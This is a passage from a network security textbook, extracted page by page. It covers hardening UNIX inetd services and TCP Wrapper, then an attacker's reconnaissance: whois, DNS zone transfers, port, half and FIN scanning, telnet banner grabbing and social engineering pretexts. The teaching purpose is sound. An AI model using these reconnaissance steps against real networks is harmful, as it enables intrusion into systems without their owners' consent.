\npop-3 stream tcp nowait root /usr/sbin/tcpd ipop3d \nimap stream tcp nowait root /usr/sbin/tcpd imapd \n# \n# Tftp service is provided primarily for booting. Most sites \n# run this only on machines acting as \"boot servers.\" Do not uncomment \n# this unless you *need* it. \n# \n#tftp dgram udp wait root /usr/sbin/tcpd in.tftpd \n#bootps dgram udp wait root /usr/sbin/tcpd bootpd \n# \n# Finger, systat and netstat give out user information which may be \n# valuable to potential \"system crackers.\" Many sites choose to \ndisable \n# some or all of these services to improve security. \n# \n# cfinger is for GNU finger, which is currently not in use in RHS Linux \n# \nfinger stream tcp nowait root /usr/sbin/tcpd in.fingerd \n#cfinger stream tcp nowait root /usr/sbin/tcpd in.cfingerd \n#systat stream tcp nowait guest /usr/sbin/tcpd /bin/ps -auwwx \n#netstat stream tcp nowait guest /usr/sbin/tcpd /bin/netstat -f \ninet \n# \n# Time service is used for clock synchronization. \n# \ntime stream tcp nowait nobody /usr/sbin/tcpd in.timed \ntime dgram udp wait nobody /usr/sbin/tcpd in.timed \n# \n# Authentication \n# \nauth stream tcp nowait nobody /usr/sbin/in.identd in.identd \n" }, { "page_number": 332, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 332\n-l -e -o \n# \n# End of inetd.conf \nFrom left to right, each line entry includes \nƒ \nThe service, as identified in the services file \nƒ \nThe socket type \nƒ \nThe transport \nƒ \nThe flags to use at initialization \nƒ \nThe user account that provides privileges for this daemon \nƒ \nThe name of the daemon, including any required switches \nOnce inetd has checked the services file and identified a service request as looking for telnet, inetd will access the \ninetd.conf file and reference the following line: \ntelnet stream tcp nowait root /usr/sbin/tcpd in.telnetd \nThis tells inetd to go to the /usr/sbin directory and run the tcpd daemon using in.telnetd as a switch while using \nroot-level privileges. \nWarning \nYou should be very careful with any service that runs under root-level privileges, \nbecause such services are prime targets for attack. An attacker who can compromise a \nroot-level service may be able to steal information or install a back door to provide \nfuture access. This is why many services run as guest or nobody—compromising \nthe service will provide very little access. \nDisabling Services Called by inetd \nOne of the best ways to secure a UNIX system is to shut down all unneeded services. The more services running \non the system, the easier it is for an attacker to find an exploit that will allow access to the system. \nTip \nDisabling unneeded services is also an easy way to boost system performance. \nThe fewer processes you have enabled, the more resources you will have available \nfor the services you need to run. \nTo disable services running under inetd, simply add a pound sign (#) to the beginning of the entry within the \ninetd.conf file. For example, to disable telnet access to the system, simply change the entry to \n#telnet stream tcp nowait root /usr/sbin/tcpd in.telnetd \nOnce you have commented out all the services you do not wish to run, you simply need to restart the inetd process. \nDo this by identifying the process ID being used by the service and sending that process ID a restart request. To \nfind the process ID for inetd, type the following: \n[root@thor /etc]# ps -ax|grep inetd \n 151 ? SW 0:00 (inetd) \n 7177 p0 S 0:00 grep inetd \n[root@thor /etc]# kill -HUP 151 \n[root@thor /etc]# \nThe ps -ax portion of the first command lists all running processes. Instead of letting this output scroll past the top \nof the screen, we have piped ( | ) it to the grep command. We are telling grep to filter through the output produced \nby ps -ax and only show us the entries that include the keyword inetd. The first entry (process ID 151) is the actual \ninetd process running on the UNIX system. The second listing (process ID 7177) is our grep command performing \nits search. \nNow that you know the process ID being used by inetd, you can signal to the process that you want it to restart. \nThis is done with the second command: kill -HUP 151. \nNote \nRemember that with UNIX case is important, so you must type in the command exactly. \nOnce you have restarted inetd, it should ignore service requests that you have commented out. You can test this by \nusing telnet and pointing it to the service port in question. For example, \ntelnet thor 110 \nwill create a connection with the POP3 service port (110). If you have commented out the POP3 service, you \nshould immediately receive a Connection Refused error. \n" }, { "page_number": 333, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 333\nWorking with Other Services \nNot all services are called by inetd. BIND, Sendmail, and SAMBA, for example, each commonly runs as its own \nprocess. HTTP is another service that is commonly run as its own process and is not called by inetd. This is done \nfor performance reasons: the service can respond to requests faster if it does not have to wait for inetd to wake it \nup. On an extremely busy system, this can provide a noticeable improvement in performance. \nDisabling Stand-Alone Services \nTo disable a stand-alone service, you need to disable the initialization of that service during system startup. Many \nservices will look for key files before they initialize. If this key file is not found, the service is not started. This is \ndone to prevent errors. For example, BIND will look for the file /etc/named.boot during startup. Sendmail checks \nfor a file named sendmail.cf before it will initialize. If these files are not found, the process fails to start. \nOne of the methods you can use to disable a process from starting is to delete or rename the process’s key file. For \nexample, the command \nmv named.boot named.boot.old \nwill rename the named.boot file named.boot.old. This will prevent BIND from being able to locate its key file, \nthus causing initialization to fail. \nYou can also disable a stand-alone service by renaming its initialization script or by commenting it out. For \nexample, in the Linux world, all process initialization scripts are stored under /etc/rc.d/init.d. These initialization \nfiles bear the names of the processes that they start. For example, the Sendmail initialization script is named \nsendmail.init. By renaming this file to sendmail.init.old, you can prevent Sendmail from being called during \nsystem initialization. \nOnce you have changed your initialization files so that all unnecessary daemons will not be started, you can restart \nthe system or simply kill the current process. To kill a running process, use the ps and grep commands, as we did \nin the inetd example. You would then issue the kill command without any switches. The output of these \ncommands would appear similar to this: \n[root@thor /root]# ps -ax|grep sendmail \n 187 ? S 0:00 (sendmail) \n 258 p0 S 0:00 grep sendmail \n[root@thor /root]# kill 187 \n[root@thor /root]# ps -ax|grep sendmail \n 263 p0 S 0:00 grep sendmail \n[root@thor /root]# \nOnce you have reduced the number of services running on your UNIX system, you can use TCP Wrapper to limit \nwho can access these services. \nTCP Wrapper \nTCP Wrapper allows you to specify which hosts are allowed to access each service managed by inetd. Most \nmodern versions of UNIX ship with TCP Wrapper pre-installed. \nNote \nDespite its name, TCP Wrapper can be used with services that require either TCP or UDP \nas a transport. \nTCP Wrapper is activated by having inetd call the TCP Wrapper daemon instead of the actual service daemon. \nLet’s refer back to our telnet example: \ntelnet stream tcp nowait root /usr/sbin/tcpd in.telnetd \ninetd is actually calling the TCP Wrapper daemon (tcpd), not the telnet daemon (in.telnetd). Once tcpd is called, \nthe service request is compared to a set of access rules. If the connection is acceptable, it is allowed to pass \nthrough to the in.telnetd daemon. If the connection request fails access control, the connection is rejected. \nAccess control is managed using two files: \nhosts.allow Defines which systems will be permitted access to each service \nhosts.deny Defines which service requests will be rejected \nWhen verifying access from a remote system, tcpd first checks the hosts.allow file. If no matching entry is found, \ntcpd then checks the hosts.deny file. The syntax of both files is as follows: \n: \n" }, { "page_number": 334, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 334\nValid services can only be those services managed by inetd. Valid hosts can be listed by host name, domain, or IP \naddress. For example, consider the following output: \n[root@thor /etc]# cat hosts.allow \npop-3, imap: ALL \nftp: .foobar.com \ntelnet: 192.168.1 \nfinger: 192.168.1.25 \n[root@thor /etc]# cat hosts.deny \nANY: ANY \nThe hosts.allow file states that all hosts with connectivity to the system are permitted to access POP3 and IMAP \nservices. FTP, however, is limited to hosts within the foobar.com domain. We have also limited telnet access to \nsource IP addresses on the 192.168.1.0 network. Finally, only the host at IP address 192.168.1.25 is allowed to \nfinger the system. \nThe hosts.deny entry allows us to define the security stance \"that which is not expressly permitted is denied.\" If a \nservice request is received and a match is not found in the hosts.allow file, this catchall rule specifies that we do \nnot wish to allow the remote system access to our UNIX server. \nTCP Wrapper is an excellent way to fine tune access to your system. Even if all your UNIX systems are sitting \nbehind a firewall, it cannot hurt to take preventive measures to lock them down further. This helps to insure that \nanyone who manages to sneak past the firewall will still be denied access to your UNIX system. \nSummary \nIn this chapter you saw how to go about locking down your UNIX (or UNIX-based system, like \nLinux and FreeBSD) system. We discussed file permissions and how they can be tuned to \nrestrict access to sensitive files. You also looked at how the UNIX system deals with \nauthentication and why it is so important to lock down the root user account. Finally, you \nlooked at IP services and how you can limit which hosts have access to them. \nThe next chapter will look at some common exploits, describing how each vulnerability is \nexploited and what you can do to protect your network. \n \nChapter 16: The Anatomy of an Attack \nIn this chapter, we will look at some of the common tricks and tools that an attacker may use in order to \ncompromise your assets. This is not intended to be a how-to on attacking a network. Rather, it is intended to show \nyou, the network administrator, how an attacker is likely to go about finding the points of vulnerability within your \nnetwork. Here, we will focus on how you can identify the signs of an attack and what you can do to prevent it. \nThe initial discussions will assume that the attacker is someone outside of your network perimeter who is trying to \nbreak in. This is done simply to show what additional steps an attacker must take when working with limited \ninformation. A regular user on your network, who already has an insider’s view of your network, would be able to \nskip many of these steps. As you saw in Chapter 1, an overwhelming majority of network attacks originate from \ninside the network. This means that the precautionary steps you take to secure your network resources cannot \nconcentrate solely on the network perimeter. \nCollecting Information \nWoolly Attacker has seen one of your TV ads and decided that your political views do not match his own. He \ndecides his best recourse is to attack your network. The question is, where to begin? At this point, Woolly does not \neven know your domain name. In order to attack your network, he has to do some investigative work. \nThe whois Command \nThe first thing Woolly can try is a whois query at the InterNIC. The InterNIC maintains a publicly accessible \ndatabase of all registered domain names. This database can be searched using the whois utility. By querying for \nthe name of the organization, Woolly will be able to find out if it has a registered domain name. For example, \nsearching for an organization named CameronHunt.com would produce something that looks like the following: \n[granite:~]$ whois CameronHunt.com \n" }, { "page_number": 335, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 335\nRegistrant: \nCameron Hunt (CAMERONHUNT-DOM) \n 392 E. 12300 So. Ste A. \n Draper, UT 84020 \n US \n Domain Name: CAMERONHUNT.COM \n Administrative Contact, Technical Contact, Billing Contact: \n Hunt, Cameron (CHL150) cam@cameronhunt.com \n 10312 Bay Club Ct. \n Tampa, FL 33607 \n (813) 207-0363 \n \n Record last updated on 05-Apr-2000. \n Record expires on 19-Jan-2002. \n Record created on 19-Jan-2000. \n Database last updated on 12-Feb-2001 16:21:38 EST. \n \n Domain servers in listed order: \n \n DNS.CAMERONHUNT.COM 64.36.56.58 \n DNS.COPPERKNOB.COM 64.36.56.59 \n \nBy running this simple command, we now have some interesting information to work with. So far we know \nƒ \nThe organization’s domain name \nƒ \nThe organization’s location \nƒ \nThe organization’s administrative contact \nƒ \nThe phone number and fax number for the administrator \nƒ \nA valid subnet address within the organization (64.36.56.0) \nDomain Name \nThe organization’s domain name is important because it will be used to collect further information. Any host or \nusers associated with this organization will also be associated with this domain name. This gives Woolly a \nkeyword to use when forming future queries. In the next section, we will use the domain name discovered here to \nproduce some additional information. \nPhysical Location \nWoolly also knows where this organization is located. If he is truly intent on damaging this network or stealing \ninformation, he may now attempt to apply for a temporary job or even better, offer his consulting services. This \nwould allow him to be granted a certain level of access to network resources in order to continue his investigation \nor possibly to install backdoor access into the network. While this would require quite a bit of legwork, the easiest \nway to breach a network perimeter is to be invited inside it. \nThe address also tells Woolly where to go if he wishes to do a bit of dumpster diving. Dumpster diving is when an \nattacker rummages through a dumpster in an effort to find company private information. This can be valid account \nnames, passwords, or even financial information. Over the years, this process has been simplified because many \norganizations separate their paper trash from the rest for recycling. This makes finding useful information far \neasier and a lot cleaner. \n" }, { "page_number": 336, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 336\nAdministrative Contact \nThe administrative contact is typically an individual who is responsible for maintaining the organization’s \nnetwork. In some cases, a technical contact, who is subordinate to the administrative contact, will be listed as well. \nThis can be extremely useful information if Woolly wants to attempt a social engineering attack. For example, he \ncould now call an end user and state, “Hi, I’m Sean, who has just been hired on the help desk. Tom Smith asked \nme to call you because there is a problem with your account on one of the servers. What’s your password?” If \nWoolly gets lucky, he will end up with a valid logon name and password, which will provide at least minimal \naccess to network resources. This minimal access is all that is required to get a foothold and go after full \nadministrator access. \nPhone Numbers \nPhone numbers may seem like a strange piece of information to go after, but they can actually be quite useful. \nMost organizations utilize a phone service called Direct Inward Dial (DID). DID allows someone to call a seven-\ndigit phone number and directly reach the desk of an employee without going through an operator. The numbers \nare usually issued in blocks. For example, 555-0500 through 555-0699 may be a block of DID numbers assigned \nto a specific organization. DID makes it very easy for an attacker to discover every phone number your \norganization uses. \nSo Woolly may try calling phone numbers that are just a few numbers off from the listed contact. This may allow \nhim to reach other employees on whom to attempt his previously described social engineering attack. Woolly may \nalso set up a war dialer in order to test consecutive phone numbers. A war dialer is simply a piece of software that \ndials a series of phone numbers. The war dialer will then identify which phone numbers were answered by a \ncomputer. This allows Woolly to review the lists and attempt to infiltrate any phone number that was answered by \na computer. If his social engineering attack was successful, he even has a valid account to try. \nValid Subnet \nOne of the last pieces of information produced by the whois command is an IP address entry for \nDNS.CAMERONHUNT.com. Since this host is part of our target domain, we can assume that the subnet it sits on \nis also part of this same domain. Woolly does not know whether the host is inside or outside the firewall, but he \nnow knows one valid subnet to use once he decides to launch his attack. \nThe nslookup Command \nNow that the whois command has given Woolly a starting reference point, he can use the nslookup command to \ncollect even more information. The nslookup command allows you to query DNS servers in order to collect host \nand IP address information. If Woolly wishes to attack the network, he must find out what hosts are available as \ntargets. The nslookup utility does an excellent job of supplying this information. \nWhat a War Dialer Can Find \nIt is not uncommon for organizations to overlook security on their dial-in devices. For example, in the spring of \n1998, Peter Shipley (who designed a very well known vulnerability analysis tool known as SATAN) used a war \ndialer to systematically call phone numbers within the San Francisco Bay area. He found multiple systems that \ngranted full access without any type of authentication. These included \nƒ \nA firewall that protected a financial services organization \nƒ \nA hospital system that allowed patient records to be viewed or modified \nƒ \nA fire department system allowing fire engines to be dispatched \nWhile these are extreme examples, it is not uncommon for organizations to allow their users to have modems on \ntheir desktops. This, in effect, puts the employee in charge of security for that modem line, something many \nemployees may not be qualified to handle. \n \nWhen Woolly launches the nslookup utility, he is informed of the current DNS that nslookup will use, as shown in \nthe following output: \n[granite:~]$ nslookup \nDefault Server: granite.sover.net \nAddress: 209.198.87.33 \n> \n" }, { "page_number": 337, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 337\nThis output tells us that nslookup will use the server granite.sover.net when making DNS queries. Since Woolly \nwants to find out information about CAMERONHUNT.com, he would change the default DNS server to one of \nthe two systems listed in the whois output. This is shown in the following output: \n> server DNS.CAMERONHUNT.COM \nDefault Server: DNS.CAMERONHUNT.COM \nAddress: 64.36.56.58 \n \n> \nThe nslookup utility is now pointed at DNS, one of CameronHunt’s DNS servers. All queries will now be directed \nto this system instead of to granite. The first thing that Woolly will want to try is to perform a zone transfer. A \nzone transfer will allow Woolly to collect all host and IP address information with a single command. This is \nshown in the following output: \n> ls -d CAMERONHUNT.COM > hosts.lst \n[DNS.CAMERONHUNT.COM] \nReceived 20 answers (0 records). \n> exit \nThe first command attempts to get the DNS server to list all valid host information for the CAMERONHUNT.com \ndomain and output this to a file called hosts.lst. The fact that he received 20 answers to his query tells Woolly that \nthe command was successful, and he now has a valid list of all hosts registered with the DNS. Of course, newer \nDNS systems (like Windows 2000 DNS, which stores its zone files within Active Directory) will refuse such a \nrequest unless the transfer is initially authenticated. But many administrators (as evaluated by security experts and \ndemonstrated by the many number of DNS hacks—even at Microsoft) do not activate this simple security \nprocedure. At this point, Woolly exits the nslookup utility because he was able to gather quickly all the \ninformation he required. \nTip \nYou can limit who can perform zone transfers from your name servers by using the xfers \ncommand (if your DNS system supports the named.boot file). This command is placed in \nthe named.boot file and precedes a list of IP addresses that are the only systems allowed to \nperform zone transfers with the name server. \nHad Woolly received a “Can’t list domain” error message, this would have been an indication that zone transfers \nfrom this name server were limited to only specific hosts. Woolly would now be forced to systematically try some \ncommon names such as mail, ftp, www, and so on, in order to discover additional subnets within the \nCameronHunt network. There is no guarantee that Woolly would have been able to identify every valid name \nusing this method, because this process would become a guessing game. The zone transfer was successful, \nhowever, as shown by the contents of the hosts.lst file: \n [DNS.CAMERONHUNT.COM] \n$ORIGIN CAMERONHUNT.COM. \n@ 1H IN SOA DNS postmaster ( \n 5 ; serial \n 1H ; refresh \n 10M ; retry \n 1D ; expiry \n 1H ) ; minimum \n 1H IN NS dns \n 1H IN NS 206.79.230.10 \n 1H IN MX 5 mail \ncam 1H IN CNAME mail \nftp 1H IN CNAME web \nweb 1H IN A 64.36.56.58 \nhoneypot 1H IN A 64.36.55.57 \nwww 1H IN A web \n" }, { "page_number": 338, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 338\nThis file has produced some very useful information. Woolly may have two valid IP subnets at which he can direct \nhis attacks instead of just one (64.36.56.0 and 64.36.55.0). The 206.79.230.0 subnet is not a target because the \nwhois information lists this host as being part of another domain (exodus.net). \nWoolly also knows that mail is the mail system for the domain because of the MX record entry. In addition, he \nknows that mail is the only mail system, so if he can disable this one host he can interrupt mail services for the \nentire domain. Finally, this file shows that the Web server is also acting as the FTP server. It may be possible for \nWoolly to use the FTP service in order to compromise the Web server and corrupt Web pages. This would allow \nhim to penetrate potentially sensitive information. \nSearch Engines \nSearch engines can be an excellent method of collecting additional information about an organization’s internal \nnetwork. If you have not done so already, try searching for hits on your organization’s domain name. You will be \namazed at the amount of information that accrues once an organization has been online for a while. This can \ninclude mail messages, newsgroup posts, and pages from internal Web servers (if they are visible from the \nInternet). \nFor example, look closely at Figure 16.1. The domain bofh.org has a mail relay named thor.bofh.org that is \nresponsible for sending and receiving all e-mail. As far as the outside world is concerned, Thor is bofh.org’s only \nmail system. If you look closely at this mail header, however, you will see that there is another mail system hiding \nbehind Thor named mailgw.bofh.org. \n \nFigure 16.1: A search engine hit that displays an e-mail header \nThis mail header reveals quite a bit of information that could be used to attack the internal network. The \ninformation within the mail header tells us \nƒ \nThe mail relay Thor is a UNIX machine running Sendmail (version 8.7.1 at the time of this \nposting). \nƒ \nThe mail relay is on IP subnet 201.15.48.0. \nƒ \nThere is a second mail system hiding behind Thor named mailgw.bofh.org. \nƒ \nThe mailgw host is on IP subnet 201.15.50.0. \nƒ \nThe mailgw host is an NT server running Postal Union’s gateway software. \nƒ \nThe internal mail system is Microsoft Mail. \nNot bad for a single search engine hit. \nTip \nThe way to avoid this problem is to have the mail relay strip all previous outbound mail \nheader information. This will make it appear as though all mail originates from the relay \nitself, thus preventing any information about your internal network from leaking out. \n \nProbing the Network \nNow that Woolly has collected some general information about the target, it is time for him to begin probing and \nprodding to see what other systems or services might be available on the network. Woolly would do this even if he \nhas already found his way inside the firewall through some other means, such as a contract job or dial-in access. \nProbing gives an attacker a road map of the network, as well as a list of available services. \n" }, { "page_number": 339, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 339\nThe traceroute Command \nThe traceroute command is used to trace the network path from one host to another. This is useful when you wish \nto document the network segments between two hosts. An example of the output created by traceroute is shown in \nFigure 16.2. \n \nFigure 16.2: Output from the traceroute command \nNote \nIn the Windows world, the command name is truncated to tracert in order to \naccommodate an eight-character filename. \nThe output in Figure 16.2 shows us the host name and IP address of each router that must be crossed between the \nsource and destination systems. The three preceding columns identify the amount of time it takes to cross the \nprevious network segment. \nJust before reaching DNS, we crossed a few network segments on powerinternet .net. Notice also that several hops \ntimed out and failed to respond to a traceroute query. This could be because of a slow link speed or possibly \nbecause the device is filtering out these requests. \nReturning to our nslookup information, Woolly still needs to verify whether the honeypot address is located within \nthe CameronHunt.com domain or that the Web site is hosted at an alternate location. To find out, he can rerun the \ntraceroute command, only this time using honeypot.CameronHunt.com as a target system. The output of this test is \nshown in Figure 16.3. As you can see, the trace terminates on an unknown network. This verifies that honeypot is \na host that doesn’t exist and that Woolly has only the 64.36.56.0 subnet to use when targeting attacks. \n \nFigure 16.3: Woolly verifies that honeypot isn’t a valid host. \nNote \nIf Woolly had taken a contract job with CameronHunt.com or found his way into the \nnetwork by some other means, the traceroute command would be able to produce even \nmore information; it would document each of the internal IP subnets, as well as which \nrouters connect them. By choosing a few selective hosts, Woolly would be able to \ngenerate a full network diagram. \n" }, { "page_number": 340, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 340\nHost and Service Scanning \nHost and service scanning allows you to document what systems are active on the network and which ports are \nopen on each system. This is the next step in identifying which systems may be vulnerable to attack. The steps to \nperform are \n1. Find every system on the network. \n2. Find every service running on each system. \n3. Find out which exploits each service is vulnerable to. \nThese steps can be performed individually, or you can locate a tool that will perform all of them at once. For the \nsake of completeness, we will look at each of these steps one at a time. \nPing Scanning \nA Ping scanner simply sends an ICMP request to each sequential IP address on a subnet and waits for a reply. If a \nreply is received, the scanner assumes that there is an active host at this address. The scanner will then create a log \nentry of the systems that respond and possibly attempt to resolve the IP address to a host name. A simple batch or \nscript file can be used to create a homespun Ping scanner. You can also find a number of graphical utilities such as \nWildPackets’ (formerly AG Group) iNetTools, shown in Figure 16.4. \n \nFigure 16.4: The Ping scanner included in the iNetTools utility \nTip \nAn additional feature of the iNetTools utility is that if the tool cannot resolve the IP address \nto a DNS host name, it will attempt to look up the system’s NetBIOS name instead. This is \nhelpful if you are scanning a network with many Windows desktop systems that may not \nhave entries on the DNS server. \nPort Scanning \nA port scanner allows you to sequentially probe a number of ports on a target system in order to see if there is a \nservice that is listening. Think of a burglar walking through an apartment building and jiggling all the doorknobs \nto see if one is unlocked, and you will get the idea. A port scanner simply identifies which well-known services \nare listening and waits for connection requests. \nFigure 16.5 shows the results of a scan against the system 64.36.56.59 using iNetTools. As you can see, iNetTools \nhas identified a number of open ports on this system. Notice that the information about which ports are open \nreveals the functionality of a system, which in this case is acting as an FTP, mail, DNS, and Web server. \n" }, { "page_number": 341, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 341\n \nFigure 16.5: A port scan of a system \nExactly how does a port scanner work? This is shown in Figure 16.6. If you look at packet 35, the port scanner \ninitiates a TCP three-packet handshake with a machine named Thor. The port scanner transmits a packet with a \nflag setting of SYN=1 with a destination port of 23 (telnet). In packet 36, Thor replies by transmitting a response \nof SYN=1, ACK=1. Because of this response by Thor, the port scanner knows that there is a service listening at \nthe telnet port. In packet 37, the scanner completes the three-packet handshake by transmitting ACK=1. The \nscanner then immediately ends the session in packet 38 by transmitting ACK=1, FIN=1. In packet 39, Thor \nacknowledges this request by transmitting ACK=1. \n \nFigure 16.6: An analyzer trace of a TCP port scan \nThe scanner knew that Thor was listening on port 23 because it was able to complete a full TCP three-packet \nhandshake with the system. To find out what happens when a service is not active, refer back to Figure 16.6, but \nthis time look at packets 55, 56, and 57. In these three transmissions, the scanner is probing Thor at ports 22, 26, \nand 24, respectively, to see if a service is listening. In packets 58, 59, and 60, Thor replies by transmitting ACK=1, \nRST=1. This is a target system’s way of letting the source know that there is no service available on that port. By \nsorting through the different responses, a port scanner can accurately log which ports have active services. \nPort scanning has a few shortcomings. The first is that the connection attempt will most certainly be logged by the \ntarget system. This would provide the system administrator on the target system with a record that a port scan has \ntaken place. The second is that port scanning can easily be filtered out by any packet filter or firewall. This is \nbecause the port scanner relies on the initial connection packet with SYN=1. \nTCP Half Scanning \nTCP half scanning was developed in order to get past the logging issue. A TCP half scan does not try to establish a \nfull TCP connection. The half scanner transmits only the initial SYN=1 packet. If the target system responds with \na SYN=1, ACK=1, then the half scanner knows that the port is listening and immediately transmits an RST=1 in \norder to tear down the connection. Since a full connection is never actually established, most (but not all) systems \nwould not log this scan. Since a TCP half scan still relies on the initial SYN=1 packet, it can be blocked by a \npacket filter or firewall, just like a full scanner. \nFIN Scanning \nThe final type of scanner is known as a FIN scanner. A FIN scanner does not transmit a SYN=1 packet in an \nattempt to establish a connection. Rather, a FIN scanner transmits a packet with ACK=1, FIN=1. If you refer back \nto packet 38 in Figure 16.6, you will remember that these are the flags we used in order to tear down our TCP \nconnection. In effect, the FIN scanner is telling the target system that it wishes to tear down a connection, even \nthough no connection exists. \nNote \nHow the target system responds is actually kind of interesting (to a bit weenie, anyway). \nIf the target port does not have a service listening, the system will respond with the \nstandard ACK=1, RST=1. If there is a service listening, however, the target system will \nsimply ignore the request. This is because there is no connection for the target system to \ntear down. By sorting through which ports elicit a response and which do not, a FIN \n" }, { "page_number": 342, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 342\nscanner can determine which ports are active on the target system. \nWhat makes this type of scanner even more lethal is that neither a static packet filter nor many firewalls will block \nthis type of scan. This allows an attacker to identify systems even if they are on the other side of a firewall. \nFIN scanning does not work on every type of system. For example, a Microsoft TCP stack will respond with an \nACK=1, RST=1 even if the port is active. This means that while Microsoft’s TCP stack does not comply with \nRFC 973, you cannot use a FIN scanner against a Windows systems in order to identify active ports because it will \nappear that none of the system’s ports has active services. The ACK=1, RST=1 will still inform the attacker that a \nsystem is present, however, and that it is some form of Microsoft operating system. \nPassive Monitoring \nIn order to collect more information about your network, an attacker may attempt to monitor traffic. This can be \naccomplished by directly installing an analyzer onto your network or, more subversively, by identifying internal \nsystems. You have seen what an attacker can learn by installing a network analyzer on your network to monitor \ntraffic flow. In this section, we will look at one of the more subtle methods an attacker can use to collect \ninformation about your internal systems. \nFor example, review the packet capture in Figure 16.7. This is a standard HTTP data request that a client sends to \na Web server. If Woolly Attacker is able to get some of your internal users to connect to his Web site (perhaps \nthrough an enticing e-mail), he has the possibility of collecting a wealth of information. Starting at about halfway \nthrough the packet capture, our Web client is telling the remote Web server several things: \nƒ \nThe preferred language is English. \nƒ \nThe system is running at 800 × 600 resolution. \nƒ \nThe video card supports 16 million colors. \nƒ \nThe operating system is Windows 95. \nƒ \nThe system uses an x86 processor. \nƒ \nThe browser is Microsoft Internet Explorer version 3.0. \n \nFigure 16.7: An HTTP data request \nThe last three pieces of information are the most interesting. Woolly now knows that if he wishes to attack this \nsystem, he needs to focus on exploits that apply to an x86 system running Windows 95 and Internet Explorer 3.0. \nAs you will see later in this chapter, many of these can be launched simply by having an IE user download a Web \npage. \nOne of the reasons that proxy firewalls are so popular is that most of them filter out information regarding \noperating system and browser type. This puts an attacker in a hit-or-miss position: the exploit may or may not \nwork on the target system. \nNote \nThe less information you unknowingly hand out about your network, the harder it will be \nfor an attacker to compromise your resources. \nChecking for Vulnerabilities \nNow that Woolly has an inventory of all systems on the network and he knows what services are running on each, \nhe can turn his attention to finding out what vulnerabilities can be exploited. This can be accomplished in a hit-or-\nmiss fashion by simply launching the exploit to see what happens. A dangerous attacker, however, will take the \ntime required to know that an exploit will work before trying it. This helps to insure that the attacker does not set \n" }, { "page_number": 343, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 343\noff some kind of alarm while bumping around in the dark. Vulnerability checks can be performed manually or \nautomatically through some form of software product. \nManual Vulnerability Checks \nManual vulnerability checks are performed by using a tool, such as telnet, to connect to a remote service and see \nwhat is listening. Most services do a pretty good job of identifying themselves when a remote host connects to \nthem. While this is done for troubleshooting purposes, it can provide an attacker with more information than you \nintended to give out. \nFor example, take a look at Figure 16.8. We have opened a telnet session to the SMTP port on mailsys.foobar.org. \nThis was accomplished by typing the following command at a system prompt: \ntelnet mailsys.foobar.org 25 \n \nFigure 16.8: Using telnet to connect to a remote mail server \nThe trailing 25 tells telnet not to connect to the default port of 23; rather, it should connect to port 25, which is the \nwell known port for SMTP. As you can see, this mail server is more than happy to let us know that it is running \nMicrosoft Exchange (thus the OS is Windows NT) and that the software version is 5.0. The build number of \n1457.7 tells us that there are no Exchange service packs installed. This build is the original 5.0 version. An \nattacker looking to disable this system now knows to look for vulnerabilities that pertain to Exchange 5.0. Table \n16.1 shows a number of commands you can use when connecting to a service port via telnet. \nTable 16.1: Service Port Commands When Using Telnet \nService \nPort \nCommands \nComments \nFTP \n21 \nuser, pass, \nstat, quit \nThis \nprovides a \ncommand \nsession \nonly. You \ncannot \ntransfer a \nfile. \nSMTP \n25 \nhelo, mail \nfrom:, rcpt \nto:, data, \nquit \nE-mail can \nbe forged \nusing \nthese \ncommands\n. \nHTTP \n80 \nget \nYou will \nreceive a \npage error, \nbut you will \nat least \nknow the \nservice is \nactive. \nPOP3 \n110 \nuser, pass, \nstat, list, \nMail can \nbe viewed \n" }, { "page_number": 344, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 344\nTable 16.1: Service Port Commands When Using Telnet \nService \nPort \nCommands \nComments \nretr, quit \nby \nconnecting \nto the \nPOP3 port. \nIMAP4 \n143 \nlogin, \ncapability, \nexamine, \nexpunge, \nlogout \nAll \ncommands \nmust be \npreceded \nby a \nunique line \nidentifier. \nFigure 16.9 shows telnet being used to connect to a remote server named Thor that is running IMAP4. Notice that \nIMAP4, like many of the other services we discussed, sends passwords in the clear (2secret2 is the password for \nthe user cbrenton). Also notice that IMAP 4 expects each command from the client to be preceded by a line \nidentifier (such as 1,2,3 as used in the figure). As with Figure 16.8, we now know what software is answering \nqueries on this port. This helps us to identify which exploits may be effective against this system. \n \nFigure 16.9: Using telnet to connect to a remote IMAP4 server \nClearly, manual vulnerability-checking takes a bit of work. It is time-consuming because it requires manual \nintervention in order to verify the target service. Manual vulnerability-checking also requires that attackers have at \nleast half a clue about what they are doing. Knowing which service is running on the target system is of little help \nto an attacker who cannot figure out how to exploit this information. \nAutomated Vulnerability Scanners \nAn automated vulnerability scanner is simply a software program that automatically performs all the probing and \nscanning steps that an attacker would normally do manually. These scanners can be directed at a single system or \nat entire IP subnets. The scanner will first go out and identify potential targets. It will then perform a port scan and \nprobe all active ports for known vulnerabilities. These vulnerabilities are then reported back to the user. \nDepending on the program, the vulnerability scanner may even include tools to actually exploit the vulnerabilities \nthat it finds. \nFor example, Figure 16.10 is a screen capture of the Security Analyzer from WebTrends. By defining an IP subnet \nrange, this scanner will go out and find all active systems on that subnet. It will then perform a port scan and \nreport any vulnerabilities that may exist. The program even includes an Ethernet sniffer so that traffic along the \nlocal subnet may be monitored. As you can see from the screen capture, Security Analyzer has identified some \npotential vulnerabilities on ports 21 and 25 of the system at IP address 192.168.1.200. \n" }, { "page_number": 345, "text": "Active Defense — A Comprehensive Guide to Network Security \n \npage 345\n \nFigure 16.10: The Security Analyzer from WebTrends \nVulnerability scanners are not some mystical piece of software that can magically infiltrate a system and identify \nproblems. They simply take the manual process of identifying potential vulnerabilities and automate it. In fact, an \nexperienced attacker or hacker performing a manual vulnerability check is far more likely to be able to find \npotential problems because she is in a better position to adapt to the characteristics of each specific system. A \nvulnerability scanner is no better at performing a security audit than whoever programmed it. \nWarning \nBeware of security experts who make their living by strictly running \nautomated vulnerability software. Most will provide the canned reports \ncreated by the software package and little extra value. I’ve run into more than \none so-called expert who did not even 